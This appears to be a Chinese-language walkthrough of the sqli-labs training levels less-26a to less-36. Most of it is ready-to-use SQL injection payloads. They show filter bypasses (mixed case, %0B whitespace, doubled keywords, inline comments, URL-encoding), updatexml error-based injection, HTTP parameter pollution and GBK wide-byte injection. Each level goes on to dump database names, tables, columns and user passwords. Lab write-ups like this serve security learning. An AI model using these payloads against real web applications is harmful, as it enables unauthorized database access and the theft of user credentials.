目录
less-26a
-
但是这里,把报错关掉了
-
这点呢其实和less-26差不多,就是闭合改为,单引号加括号
2.查询数据库
?id=-1')union(select'1',database(),'33.数据表
?id=a')union(select'1',(group_concat(distinct `table_name`)),'2'from(infoorrmation_schema.columns)where `table_schema`='security'aandnd'1'='14.数据列
?id=a')union(select'1',(group_concat(column_name)),'2'from(infoorrmation_schema.columns)where `table_schema`='security'anandd`table_name`='users'anandd'1'='15.数据内容
?id=a')union(select'1',(group_concat(username,0x3a,passwoorrd)),'2'from(users)where'1'='1less-27
-
这里我们注意到她过滤了一部分联合查询,但是没有忽略大小写
-
思路 大小写混杂 报错注入
2.数据库
?id=-1'and(updatexml(1,concat(0x7e,database(),0x7e),1))or'1'='1
?id=a'uNIon%0BSElect '1',database(),'2'and'1'='13.数据表
?id=1'and(updatexml(1,concat(0x7e,(SElect (group_concat(distinct `table_name`))from(information_schema.columns)where `table_schema`='security'),0x7e),1))or'1'='1
?id=a'UNion%0BSElect'1',(group_concat(distinct `table_name`)),'2' from(information_schema.columns)where `table_schema`='security
4.数据列
?id=1'and(updatexml(1,concat(0x7e,(SElect(group_concat(column_name))from(information_schema.columns)where `table_schema`='security'and`table_name`='users'),0x7e),1))or'1'='1
?id=a'UNion%0BSElect'1',(group_concat(column_name)),'3'from(information_schema.columns)where `table_schema`='security'and`table_name`='users5.数据内容
// 这点不知道为什么SE在浏览器会被转为se导致被过滤 所以用url编码绕过
?id=-1'and(updatexml(1,substr(concat(0x7e,(%53E%4cecT(group_concat(username,0x3a,password))from(users)),0x7e),1,32),1))and'1'='1
?id=a'UNion%0BSElect'1',substr(group_concat(username,0x3a,password),1,32),'3'from(users)where'1'='1less-27a
- 相较于less-27闭合改为了双引号
2.数据库
?id=-1"and(updatexml(1,concat(0x7e,database(),0x7e),1))or'1'="1
?id=a"uNIon%0BSElect '1',database(),'2'and'1'="13.数据表
?id=1"and(updatexml(1,concat(0x7e,(SElect (group_concat(distinct `table_name`))from(information_schema.columns)where `table_schema`='security'),0x7e),1))or'1'="1
?id=a"UNion%0BSElect'1',(group_concat(distinct `table_name`)),'2' from(information_schema.columns)where `table_schema`="security
4.数据列
?id=1"and(updatexml(1,concat(0x7e,(SElect(group_concat(column_name))from(information_schema.columns)where `table_schema`='security'and`table_name`='users'),0x7e),1))or'1'="1
?id=a"UNion%0BSElect'1',(group_concat(column_name)),'3'from(information_schema.columns)where `table_schema`='security'and`table_name`="users5.数据内容
// 这点不知道为什么SE在浏览器会被转为se导致被过滤 所以用url编码绕过
?id=-1"and(updatexml(1,substr(concat(0x7e,(%53E%4cecT(group_concat(username,0x3a,password))from(users)),0x7e),1,32),1))and'1'="1
?id=a"UNion%0BSElect'1',substr(group_concat(username,0x3a,password),1,32),'3'from(users)where'1'="1less-28
-
这里是有联合查询的过滤,还有没有了报错注入
-
复写注入
2.数据库
?id=a')union%0Bunion%0Bselectselect'1',database(),('33.表注入
?id=a')union%0Bunion%0Bselectselect'1',(group_concat(distinct `table_name`)),'2' from(information_schema.columns)where `table_schema`=('security4.列注入
?id=a')union%0Bunion%0Bselectselect'1',(group_concat(column_name)),'3'from(information_schema.columns)where `table_schema`='security'and`table_name`=('users5.数据查找
?id=a')union%0Bunion%0Bselectselect'1',substr(group_concat(username,0x3a,password),1,32),'3'from(users)where'1'=('1less-28a
-
这题和less-28差不多,一样注入
-
复写注入
2.数据库
?id=a')union%0Bunion%0Bselectselect'1',database(),3--+
?id=a')/*!union*/ select 1, database(),3--+ //内联注释绕过3.表注入
?id=a')union%0Bunion%0Bselectselect'1',(group_concat(distinct `table_name`)),'2' from(information_schema.columns)where `table_schema`='security'--+
?id=a')union/**/select'1',(group_concat(distinct `table_name`)),'2' from(information_schema.columns)where `table_schema`='security'--+ //注释绕过4.列注入
?id=a')union%0Bunion%0Bselectselect'1',(group_concat(column_name)),'3'from(information_schema.columns)where `table_schema`='security'and`table_name`='users'--+5.数据查找
?id=a')union%0Bunion%0Bselectselect'1',substr(group_concat(username,0x3a,password),1,32),'3'from(users)--+less-29
-
这里我们发现它在java_imlimentation,在经过exlode函数,以&符为分割,取值,在whitelist过滤他取得是第一个值,
-
所以我们考虑传入多个id值
-
这里在less1中发现传入多个id值发现是取的最后一个值
2.爆库名
?id=1&id=-1'union select 1,database(),3--+3.爆表名
id=1&id=-1'union select 1, group_concat(distinct table_name),3 from information_schema.columns where table_schema = 'security'--+4.列名
id=1&id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema = 'security' and table_name = 'users'--+5.用户信息
id=1&id=-1' union select 1,group_concat(username), group_concat(password) from users --+ less-30
- 这题与less29差不多,就改为了双引号闭合
2.爆库名
?id=1&id=-1"union select 1,database(),3--+3.爆表名
id=1&id=-1"union select 1, group_concat(distinct table_name),3 from information_schema.columns where table_schema = 'security'--+4.列名
id=1&id=-1" union select 1,2,group_concat(column_name) from information_schema.columns where table_schema = 'security' and table_name = 'users'--+5.用户信息
id=1&id=-1" union select 1,group_concat(username), group_concat(password) from users --+ less-31
- 这题与less30差不多,就改为了双引号和括号闭合
2.爆库名
?id=1&id=-1")union select 1,database(),3--+3.爆表名
id=1&id=-1")union select 1, group_concat(distinct table_name),3 from information_schema.columns where table_schema = 'security'--+4.列名
id=1&id=-1") union select 1,2,group_concat(column_name) from information_schema.columns where table_schema = 'security' and table_name = 'users'--+5.用户信息
id=1&id=-1") union select 1,group_concat(username), group_concat(password) from users --+ less-32
-
我们发现这里对斜线,对引号进行了转译,考虑一下宽字节注入
-
宽字节注入指的是 mysql 数据库在使用宽字节(GBK)编码时,会认为两个字符是一个汉字(前一个ascii码要大于128(比如%df),才到汉字的范围),而且当我们输入单引号时,mysql会调用转义函数,将单引号变为',其中\的十六进制是%5c,mysql的GBK编码,会认为%df%5c是一个宽字节,也就是'運',从而使单引号闭合(逃逸),进行注入攻击。
2.爆库名
?id=-1%df' union select 1,database(),3--+3.爆表名
- where后面的语句有引号可以改为16进制
?id=-1%df' union select 1, group_concat(distinct table_name),3 from information_schema.columns where table_schema = 0x73656375726974794.列名
?id=-1%df'union select 1,2,group_concat(column_name) from information_schema.columns where table_schema = 0x7365637572697479 and table_name = 0x7573657273--+5.用户信息
?id=-1%df' union select 1,group_concat(username), group_concat(password) from users --+ less-33
-
addslashes()函数将字符串中的(', ", \)转意
-
编码为gbk
-
哎哟典型的宽字节注入
2.爆库名
?id=-1%df' union select 1,database(),3--+3.爆表名
?id=-1%df' union select 1, group_concat(distinct table_name),3 from information_schema.columns where table_schema = 0x7365637572697479--+4.列名
?id=-1%df'union select 1,2,group_concat(column_name) from information_schema.columns where table_schema = 0x7365637572697479 and table_name = 0x7573657273--+5.用户信息
?id=-1%df' union select 1,group_concat(username), group_concat(password) from users --+ less-34
- 宽字节启动
1%df' union select 1,group_concat(password,username) from users--+- 这里我们发现如果直接在输入框里面写的话发现%被编译了,所以抓包干
2.爆库名
?id=-1%df' union select 1,database()--+3.爆表名
其实语句都一样,只不过在抓包里面改了
1%df' union select 1, group_concat(distinct table_name) from information_schema.columns where table_schema = 0x7365637572697479 --+4.列名
1%df'union select 1,group_concat(column_name) from information_schema.columns where table_schema = 0x7365637572697479 and table_name =0x7573657273--+5.用户信息
1%df' union select group_concat(username), group_concat(password) from users --+ less-35
- 这里貌似直接连接注入就行,就where条件需要编码
2.爆库名
?id=-1 union select 1,database(),3--+3.爆表名
?id=-1 union select 1, group_concat(distinct table_name),3 from information_schema.columns where table_schema = 0x7365637572697479--+4.列名
?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema = 0x7365637572697479 and table_name = 0x7573657273--+5.用户信息
?id=-1 union select 1,group_concat(username), group_concat(password) from users --+ less-36
-
mysqli_real_escape_string()函数将字符串中的(', ", \)转意
-
编码为gbk
-
哎哟典型的宽字节注入
2.爆库名
?id=-1%df' union select 1,database(),3--+3.爆表名
?id=-1%df' union select 1, group_concat(distinct table_name),3 from information_schema.columns where table_schema = 0x7365637572697479--+4.列名
?id=-1%df'union select 1,2,group_concat(column_name) from information_schema.columns where table_schema = 0x7365637572697479 and table_name = 0x7573657273--+5.用户信息
?id=-1%df' union select 1,group_concat(username), group_concat(password) from users --+